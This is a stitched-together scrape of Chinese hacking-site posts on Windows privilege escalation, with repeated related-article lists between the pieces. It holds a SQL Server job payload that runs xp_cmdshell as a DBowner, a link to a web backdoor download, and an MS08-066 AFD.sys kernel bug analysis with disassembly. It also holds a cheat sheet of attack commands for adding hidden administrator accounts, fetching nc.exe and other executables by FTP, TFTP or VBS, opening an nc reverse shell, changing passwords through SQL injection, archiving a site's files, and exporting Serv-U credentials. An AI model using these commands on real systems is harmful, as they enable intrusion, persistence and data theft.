3，给这个id赋予用户名，密码，目录，权限。
4，登陆后执行系统命令。

<b>为啥我明明显示成功了，但是却提不上去？</b>
这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。
一般有以下几种情况：
1，可能是因为管理员密码不对。
参照管理员密码的连接。
2，可能是因为管理员限制了执行SITE EXEC。
有待程序修改，程序可以加一个让他不限制的功能。
3，可能是程序问题。

</pre>
</div>
</body>
</html>

建议：
目前厂商没有任何补丁，要不大家再等等？
不过以前SU7本地溢出推出来，也没见到什么动静。-_-!
先把本地管理密码改复杂点应付着吧。

相关文章

• 2007年11月24日 -- SERV-U 6.4提权方法,通杀SERV-U版本
• 2006年10月7日 -- Serv-U提权综合工具
• 2006年09月21日 -- Serv-U本地权限提升的ASP实现
• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年12月22日 -- 关于搜狗拼音输入法提权的应用
• 2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
• 2009年05月14日 -- 关于html本地权限问题

代码：

EXEC sp_add_job @job_name = 'jktest', @enabled = 1, @delete_level = 1 EXEC sp_add_jobstep @job_name = 'jktest', @step_name = 'ExeC my sql', @subsystem = 'TSQL', @CommAnd = 'exeC master..xp_exeCresultSet N''seleCt ''''exeC master..xp_Cmdshell "<% =Serverdos%>>C:\jk.txt"'''''',N''Master''' EXEC sp_add_jobServer @job_name = 'jktest', @Server_name = '<%=Servername%>' EXEC sp_start_job @job_name = 'jktest'

其实这个方法早就有了,不过还没有特定的Dbowner提权脚本, 我简单的写了个脚本程序,方便使用.不过这个方法我已经在ASP.NET Web BackDoor中加入了这个功能. 下载地址: http://www.ahiec.net/ewebeditor/UploadFile/dbsql.rar

相关文章

• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年12月22日 -- 关于搜狗拼音输入法提权的应用
• 2009年08月5日 -- Serv-U FTP Server v8 本地提权
• 2009年05月14日 -- 关于html本地权限问题
• 2008年10月16日 -- Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(MS08-066)
• 2008年10月10日 -- 提权的一些小集合
• 2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法

相关文章

• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年12月22日 -- 关于搜狗拼音输入法提权的应用
• 2009年08月5日 -- Serv-U FTP Server v8 本地提权
• 2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
• 2008年10月16日 -- Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(MS08-066)
• 2008年10月10日 -- 提权的一些小集合
• 2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法

Author:  Polymorphours
Email:   Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:    2008-10-15

漏洞模块: AFD.sys
漏洞类型: 任意内核地址可写

这个漏洞又是一个可以写任意内核地址的漏洞，产生这个漏洞的原因是 ProbeForWrite 函数因为检查长度为 0 的Buffer被绕过。下面看下具体漏洞的情况，这个漏洞出现在函数AfdGetRemoteAddress 中，当传入的第7个参数为 0 的时候，ProbeForWrite的检查形同虚设了。
注意第六个参数 PVOID Address, 它是由 Irp->UserBuffer 传入的，而 SIZE_T Length 为OutputBufferLength，那么如果在 DeviceIoControl 中的 OutputBuffer 设置成内核需要写的地址，OutputBufferLength 设置为 0，并设置正确的 IoDeviceCode 即可触发这个漏洞.

PAGE:00017D17 ; int __stdcall AfdGetRemoteAddress(int,int,char,int,int,PVOID Address,SIZE_T Length,int)
PAGE:00017D17 __stdcall AfdGetRemoteAddress(x, x, x, x, x, x, x, x) proc near
PAGE:00017D17 ; DATA XREF: .data:0001230Co
PAGE:00017D17
PAGE:00017D17 var_24 = dword ptr -24h
PAGE:00017D17 var_20 = dword ptr -20h
PAGE:00017D17 var_1C = dword ptr -1Ch
PAGE:00017D17 ms_exc = CPPEH_RECORD ptr -18h
PAGE:00017D17 arg_0 = dword ptr 8
PAGE:00017D17 arg_8 = byte ptr 10h
PAGE:00017D17 Address = dword ptr 1Ch
PAGE:00017D17 Length = dword ptr 20h
PAGE:00017D17 arg_1C = dword ptr 24h
PAGE:00017D17
PAGE:00017D17 push 14h
PAGE:00017D19 push offset unk_11B00
PAGE:00017D1E call __SEH_prolog
PAGE:00017D1E
PAGE:00017D23 mov eax, [ebp+arg_0]
PAGE:00017D26 mov ebx, [eax+0Ch]
PAGE:00017D29 mov [ebp+var_24], ebx
PAGE:00017D2C xor esi, esi
PAGE:00017D2E mov eax, [ebp+arg_1C]
PAGE:00017D31 mov [eax], esi
PAGE:00017D33 push ebx
PAGE:00017D34 call AfdLockEndpointContext(x)
PAGE:00017D34
PAGE:00017D39 mov [ebp+var_20], eax
PAGE:00017D3C cmp eax, esi
PAGE:00017D3E jz loc_17DE0
PAGE:00017D3E
PAGE:00017D44 cmp word ptr [ebx], 0AFD2h
PAGE:00017D49 jnz loc_17DE0
PAGE:00017D49
PAGE:00017D4F cmp byte ptr [ebx+2], 3
PAGE:00017D53 jnz loc_17DE0
PAGE:00017D53
PAGE:00017D59 movzx eax, word ptr [ebx+5Ah]
PAGE:00017D5D movzx ecx, word ptr [ebx+58h]
PAGE:00017D61 add ecx, eax
PAGE:00017D63 cmp ecx, [ebx+74h]
PAGE:00017D66 ja short loc_17DE0
PAGE:00017D66
PAGE:00017D68 cmp [ebp+Length], eax
<----这里检查Buffer大小，如果Buffer大于规定的大小就有默认的大小来代替
PAGE:00017D6B jnb short loc_17D76
PAGE:00017D6B
PAGE:00017D6D mov [ebp+var_1C], 80000005h
PAGE:00017D74 jmp short loc_17D7C
<----最终导致问题点: 如果BufferLength小于的话，居然还能继续运行它向下运行
PAGE:00017D74
PAGE:00017D76 ; ---------------------------------------------------------------------------
PAGE:00017D76
PAGE:00017D76 loc_17D76: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+54j
PAGE:00017D76 mov [ebp+Length], eax
<---用规定的长度代替
PAGE:00017D79 mov [ebp+var_1C], esi
PAGE:00017D79
PAGE:00017D7C
PAGE:00017D7C loc_17D7C: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+5Dj
PAGE:00017D7C mov [ebp+ms_exc.disabled], esi
PAGE:00017D7F cmp [ebp+arg_8], 0
PAGE:00017D83 jz short loc_17D93
PAGE:00017D83
PAGE:00017D85 push 1 ; Alignment
PAGE:00017D87 push [ebp+Length] ; Length
PAGE:00017D8A push [ebp+Address] ; Address
PAGE:00017D8D call ds:ProbeForWrite(x,x,x)
<---如果 ebp+Length为0，那么检查被绕过
PAGE:00017D8D
PAGE:00017D93
PAGE:00017D93 loc_17D93: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+6Cj
PAGE:00017D93 movzx ecx, word ptr [ebx+5Ah]
PAGE:00017D97 movzx esi, word ptr [ebx+58h]
PAGE:00017D9B add esi, [ebp+var_20]
PAGE:00017D9E mov edi, [ebp+Address]
<--- memcpy的代码，拷贝数据到UserBuffer中
PAGE:00017DA1 mov eax, ecx
PAGE:00017DA3 shr ecx, 2
PAGE:00017DA6 rep movsd
PAGE:00017DA8 mov ecx, eax
PAGE:00017DAA and ecx, 3
PAGE:00017DAD rep movsb
PAGE:00017DAF mov eax, [ebx+74h]
PAGE:00017DB2 mov ecx, [ebp+arg_1C]
PAGE:00017DB5 mov [ecx], eax
PAGE:00017DB7 or [ebp+ms_exc.disabled], 0FFFFFFFFh
PAGE:00017DBB jmp short loc_17DE7
PAGE:00017DBB
PAGE:00017DBB ; ---------------------------------------------------------------------------
PAGE:00017DBD align 10h
PAGE:00017DC0 db 2 dup(90h)
PAGE:00017DC2 ; ---------------------------------------------------------------------------
PAGE:00017DC2
PAGE:00017DC2 loc_17DC2: ; DATA XREF: .rdata:00011B04o
PAGE:00017DC2 lea eax, [ebp-1Ch]
PAGE:00017DC5 push eax
PAGE:00017DC6 push dword ptr [ebp-14h]
PAGE:00017DC9 call AfdExceptionFilter(x,x)
PAGE:00017DC9
PAGE:00017DCE retn

在看看补丁的情况

PAGE:00017D17 ; int __stdcall AfdGetRemoteAddress(int,int,char,int,int,PVOID Address,int,int)
PAGE:00017D17 __stdcall AfdGetRemoteAddress(x, x, x, x, x, x, x, x) proc near
PAGE:00017D17 ; DATA XREF: .data:0001230Co
PAGE:00017D17
PAGE:00017D17 var_24 = dword ptr -24h
PAGE:00017D17 var_20 = dword ptr -20h
PAGE:00017D17 var_1C = dword ptr -1Ch
PAGE:00017D17 ms_exc = CPPEH_RECORD ptr -18h
PAGE:00017D17 arg_0 = dword ptr 8
PAGE:00017D17 arg_8 = byte ptr 10h
PAGE:00017D17 Address = dword ptr 1Ch
PAGE:00017D17 arg_18 = dword ptr 20h
PAGE:00017D17 arg_1C = dword ptr 24h
PAGE:00017D17
PAGE:00017D17 push 14h
PAGE:00017D19 push offset unk_11B00
PAGE:00017D1E call __SEH_prolog
PAGE:00017D1E
PAGE:00017D23 mov eax, [ebp+arg_0]
PAGE:00017D26 mov ebx, [eax+0Ch]
PAGE:00017D29 mov [ebp+var_24], ebx
PAGE:00017D2C xor esi, esi
PAGE:00017D2E mov eax, [ebp+arg_1C]
PAGE:00017D31 mov [eax], esi
PAGE:00017D33 push ebx
PAGE:00017D34 call AfdLockEndpointContext(x)
PAGE:00017D34
PAGE:00017D39 mov [ebp+var_20], eax
PAGE:00017D3C cmp eax, esi
PAGE:00017D3E jz loc_17DDB
PAGE:00017D3E
PAGE:00017D44 cmp word ptr [ebx], 0AFD2h
PAGE:00017D49 jnz loc_17DDB
PAGE:00017D49
PAGE:00017D4F cmp byte ptr [ebx+2], 3
PAGE:00017D53 jnz loc_17DDB
PAGE:00017D53
PAGE:00017D59 movzx eax, word ptr [ebx+5Ah]
PAGE:00017D5D movzx ecx, word ptr [ebx+58h]
PAGE:00017D61 add ecx, eax
PAGE:00017D63 cmp ecx, [ebx+74h]
PAGE:00017D66 ja short loc_17DDB
PAGE:00017D66
PAGE:00017D68 cmp [ebp+arg_18], eax
PAGE:00017D6B jnb short loc_17D76
PAGE:00017D6B
PAGE:00017D6D mov [ebp+var_1C], 80000005h
PAGE:00017D74 jmp short loc_17DE2
<---补丁就是在这里，如果访问的BufferLength小于规定的大小，那么直接返回错误
PAGE:00017D74
PAGE:00017D76 ; ---------------------------------------------------------------------------
PAGE:00017D76
PAGE:00017D76 loc_17D76: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+54j
PAGE:00017D76 mov [ebp+var_1C], esi
PAGE:00017D79 mov [ebp+ms_exc.disabled], esi
PAGE:00017D7C cmp [ebp+arg_8], 0
PAGE:00017D80 jz short loc_17D8E
PAGE:00017D80
PAGE:00017D82 push 1 ; Alignment
PAGE:00017D84 push eax ; Length
PAGE:00017D85 push [ebp+Address] ; Address
PAGE:00017D88 call ds:ProbeForWrite(x,x,x)
PAGE:00017D88
PAGE:00017D8E
PAGE:00017D8E loc_17D8E: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+69j
PAGE:00017D8E movzx ecx, word ptr [ebx+5Ah]
PAGE:00017D92 movzx esi, word ptr [ebx+58h]
PAGE:00017D96 add esi, [ebp+var_20]
PAGE:00017D99 mov edi, [ebp+Address]
PAGE:00017D9C mov eax, ecx
PAGE:00017D9E shr ecx, 2
PAGE:00017DA1 rep movsd
PAGE:00017DA3 mov ecx, eax
PAGE:00017DA5 and ecx, 3
PAGE:00017DA8 rep movsb
PAGE:00017DAA mov e
ax, [ebx+74h]
PAGE:00017DAD mov ecx, [ebp+arg_1C]
PAGE:00017DB0 mov [ecx], eax
PAGE:00017DB2 or [ebp+ms_exc.disabled], 0FFFFFFFFh
PAGE:00017DB6 jmp short loc_17DE2
PAGE:00017DB6
PAGE:00017DB6 ; ---------------------------------------------------------------------------
PAGE:00017DB8 dd 90909090h
PAGE:00017DBC db 90h
PAGE:00017DBD ; ---------------------------------------------------------------------------
PAGE:00017DBD
PAGE:00017DBD loc_17DBD: ; DATA XREF: .rdata:00011B04o
PAGE:00017DBD lea eax, [ebp-1Ch]
PAGE:00017DC0 push eax
PAGE:00017DC1 push dword ptr [ebp-14h]
PAGE:00017DC4 call AfdExceptionFilter(x,x)
PAGE:00017DC4
PAGE:00017DC9 retn
PAGE:00017DC9
PAGE:00017DC9 ; ---------------------------------------------------------------------------
PAGE:00017DCA align 4
PAGE:00017DCC db 3 dup(90h)
PAGE:00017DCF ; ---------------------------------------------------------------------------
PAGE:00017DCF
PAGE:00017DCF loc_17DCF: ; DATA XREF: .rdata:00011B08o
PAGE:00017DCF mov esp, [ebp-18h]
PAGE:00017DD2 or dword ptr [ebp-4], 0FFFFFFFFh
PAGE:00017DD6 mov ebx, [ebp-24h]
PAGE:00017DD9 jmp short loc_17DE2
PAGE:00017DD9
PAGE:00017DDB ; ---------------------------------------------------------------------------
PAGE:00017DDB
PAGE:00017DDB loc_17DDB: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+27j
PAGE:00017DDB ; AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+32j
PAGE:00017DDB ; AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+3Cj
PAGE:00017DDB ; AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+4Fj
PAGE:00017DDB mov [ebp+var_1C], 0C0000140h
PAGE:00017DDB
PAGE:00017DE2
PAGE:00017DE2 loc_17DE2: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+5Dj
PAGE:00017DE2 ; AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+9Fj
PAGE:00017DE2 ; AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+C2j
PAGE:00017DE2 push [ebp+var_20]
PAGE:00017DE5 push ebx
PAGE:00017DE6 call AfdUnlockEndpointContext(x,x)
PAGE:00017DE6
PAGE:00017DEB mov eax, [ebp+var_1C]
PAGE:00017DEE call __SEH_epilog
PAGE:00017DEE
PAGE:00017DF3 retn 20h

剩下的就是exploit它了，具体的方法也很简单，可以参照以前在 www.whitecell.org 上的代码。

WSS(Whitecell Security Systems)，一个非营利性民间技术组织，致力于各种系统安全技术的研究。坚持传统的hacker精神，追求技术的精纯。
WSS 主页：http://www.whitecell.org/
WSS 论坛：http://www.whitecell.org/forums/

相关文章

• 2011年09月21日 -- WPA2不再安全 无线加密协议曝惊天漏洞
• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年08月3日 -- 黑帽大会：HTTPS和SSL存在安全漏洞
• 2010年07月3日 -- 风讯（FooSun）GetPassword.asp页面存在任意修改密码漏洞
• 2010年05月8日 -- JBoss企业应用平台JMX控制台安全绕过漏洞
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年03月17日 -- 网页编辑器漏洞手册
• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月31日 -- 瑞星本地提权通杀利用代码

exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user nosex jerry /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators nosex /add'

xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user nosex jerry /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators nosex /add'

或者可以

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX为你要执行的命令

恢复扩散
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

如果恢复不了的解释:
因为管理员是直接删除dll文件，而没删除存储过程，你这样恢复肯定是提示存储过程已存在了。你要先删除存储过程，use master
EXEC sp_dropextendedproc 'xp_cmdshell'

然后上传xplog70.dll到某个目录，例如C盘根目录，然后执行
use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
就可以使用cmdshell存储过程执行系统指令了。

MB的没想到网关都能用NB这样设..落伍啦.落伍啦
把他设置成网关看看行不行.在NBSI执行命令那里输入：echo interface ip >ip.txt
echo set address "Backup" static 10.90.90.157 255.255.255.0 10.90.90.14 1 >>ip.txt
netsh exec ip.txt
这样就把网关设置为10.90.90.14了，然后我们ipconfig看看是不是有网关了，

echo interface ip >1.txt
echo set address "本地连接" static 192.168.1.2 255.255.255.0 192.168.1 254 1 >>1.txt
netsh exec 1.txt

address"本地连接的名称" 可以用ipconfig得到. static IP地址 子网掩码网关地址。
好了现在我PING下163看看能不能PING通，如图8

命令行FTP下载文件
echo open ip >11.txt
echo user >>11.txt
echo pass >>11.txt
echo get nc.exe >>11.txt
echo bye >>11.txt
ftp -s:11.txt

NC做反弹SHELL
在本地监听1234端口 nc -vv -l -p 1234

然后在NBSI执行命令那里nc -e cmd.exe ip 1234

改密码地
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]

查看系统在线用户
query user
注销用户
logoff
D:\web\rar.exe a -k -r -s -m1 D:\web\zhu.rar D:\web\
把站点打包到zhu.rar里，

参数说明:

a 添加文件到压缩文件中

-k 锁定压缩文件

-s产生固体存档,这样可以增大压缩比

-r包括子目录

-m1 设置压缩比

-m0 存储 添加到压缩文件时不压缩文件。
-m1 最快 使用最快方式(低压缩)
-m2 较快 使用快速压缩方式
-m3 标准 使用标准(默认)压缩方式
-m4 较好 使用较好压缩方式(较好压缩，但是慢)
-m5 最好 使用最大压缩方式(最好的压缩，但是最慢

直接 D:\web\rar.exe a -r D:\web\zhu.rar D:\web\ 效果一样

exec xp_cmdshell 'echo 内容 >>绝对路径'

sc stop MSSQLSERVER
sc config MSSQLSERVER start= disabled

导SERV-U用户.和密码,不过现在版本密码加密了``

regedit /e "D:\hosting\wwwroot\systones_com\htdocs\su.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"

导入是regedit /s xx.reg

端口:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

tftp -i serverip get xx.exe

TFTP –I 127.0.0.1 get common.dll c:\common.dll

VBS
--
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/u.txt",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\jp.exe",2

VPN
关防火和Application Layer Gateway Service

3389登陆
mstsc /console /v:IP:终端端口

相关文章

• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年12月22日 -- 关于搜狗拼音输入法提权的应用
• 2009年08月5日 -- Serv-U FTP Server v8 本地提权
• 2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
• 2009年05月14日 -- 关于html本地权限问题
• 2008年10月16日 -- Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(MS08-066)
• 2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法